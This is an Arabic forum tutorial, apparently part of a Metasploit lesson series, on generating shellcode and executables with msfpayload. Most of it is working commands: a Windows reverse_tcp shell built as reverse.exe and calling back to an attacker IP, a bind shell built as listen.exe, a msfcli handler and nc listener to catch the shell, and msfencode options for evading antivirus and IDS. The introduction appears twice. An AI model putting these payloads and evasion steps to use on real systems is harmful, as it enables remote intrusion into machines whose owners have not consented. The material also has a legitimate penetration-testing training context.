السلام عليكم ورحمه الله وبركاته
اليوم درسنآ يكمل الدرس السابق .
1- msfpayload
msfencode -2
msfpayload : اداه مهمه لعمل الـ shellcode
الجميل في الامر ان بأمكانك عمل نفس shellcode لكن بصيغ مختلفه
سواء ja va scrip t ,perl ,C ,exe,ruby, raw, VBA
طريقه عمله .
اليوم درسنآ يكمل الدرس السابق .
1- msfpayload
msfencode -2
msfpayload : اداه مهمه لعمل الـ shellcode
الجميل في الامر ان بأمكانك عمل نفس shellcode لكن بصيغ مختلفه
سواء ja va scrip t ,perl ,C ,exe,ruby, raw, VBA
طريقه عمله .
كود PHP:
./msfpayload payload var=val
var =المتغيرات مثلا lport ويعني البورت الخاص بالمهاجم
كيف نعرف متغيرات الـ payload ؟
نعرفها عن طريق الامر
كود PHP:
./msfpayload windows/shell/reverse_tcp O
local port= lport
البورت الخاص بالمهاجم ,
local host = lhost
ip الخاص بالمهاجم
خذها قاعده بدون تفكير دائما اي البايلود يستخدم اتصال عكسي reverse يحتاج lhost,lport
bind_shell
الحصول على شل بأتصال مباشر
reverse_shell
الحصول على شل بأتصال عكسي
الان نعمل تطبيق .
كود PHP:
./msfpayload windows/shell/reverse_tcp lhost=192.168.1.3 C
الان راح نعمل ملفات exe للاختراق بأستخدام msfpayload ,
البعض يتسائل يقول لماذا استخدم msfpayload لعمل ملفات exe وانا عندي shell access
صحيح عندك شل لكن الشل هذا حصلته عن طريق ثغره خارج الميتاسبلويت , الثغره تطلب مساحه معينه من الـ shellcode صغيره بحيث ما تقبل meterpreter , vncinject
طبعا الان ما فيه الا حل واحد وهو تحميل meterpreter , بكل تأكيد راح يكون exe
كيف نعمله على صيغه exe , بأستخدام mfspayload .
مثال لعمل exe
كود PHP:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe
طريقه التنصت للاتصال
./
كود PHP:
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.3 E
مثال اخر
كود PHP:
./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe
nc -vn 192.168.1.2 4444
~~~~~~~~~~~~~~~~
msfencode : اداه تستخدم لتشفير shellcode لتخطي IDS او AV
كود PHP:
Usage: ./msfencode <options>
OPTIONS:
-a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: '\x00\xff'
-c <opt> The number of times to encode the data
-e <opt> The encoder to use
-h Help banner
-i <opt> Encode the contents of the supplied file path
-l List available encoders
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file
-p <opt> The platform to encode for
-s <opt> The maximum size of the encoded data
-t <opt> The format to display the encoded buffer
-x <opt> Specify an alternate win32 executable template
الاداه واضحه جدا لكن راح تنشرح , والشرح راح يكون فديو
قبل مده انا وجدت فديو جميل جدا ويتكلم عن هذه الاداه وكيفيه تخطي
مضاد الفيروسات لمده 24 دقيقه والشرح على الوندوز .
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]
الان بقى الواجهات
1-msfconsole
msfcli -2
msfgui -3
msfwe b -4
وراح يتم التطرق لها بالدرس القادم .
قبل ما انتهي , راح اعمل اختبار سريع لـ أتأكد انك متابع الدروس معاي وفاهم جميع الدروس !
لماذا لم استخدم msfcli في هذا المثال , مع اني استطيع استخدامه ؟
كود PHP:
./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe
nc -vn 192.168.1.2 4444
ولماذا > متعوب عليها
استخدمت الاداه msfcli ,واستخدامها الزامي بمعنى اخر ما تتخلى عنها الا اذا عملت نفس الشيء msfconsole وجميعا مثل بعض !
كود PHP:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe
طريقه التنصت للاتصال
./
كود PHP:
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.3 E
الجواب راح تلقونه بالدروس السابقه اذا كنت متابع
hint: الجواب 5 كلمات
حياكم الله
{[['
']]}
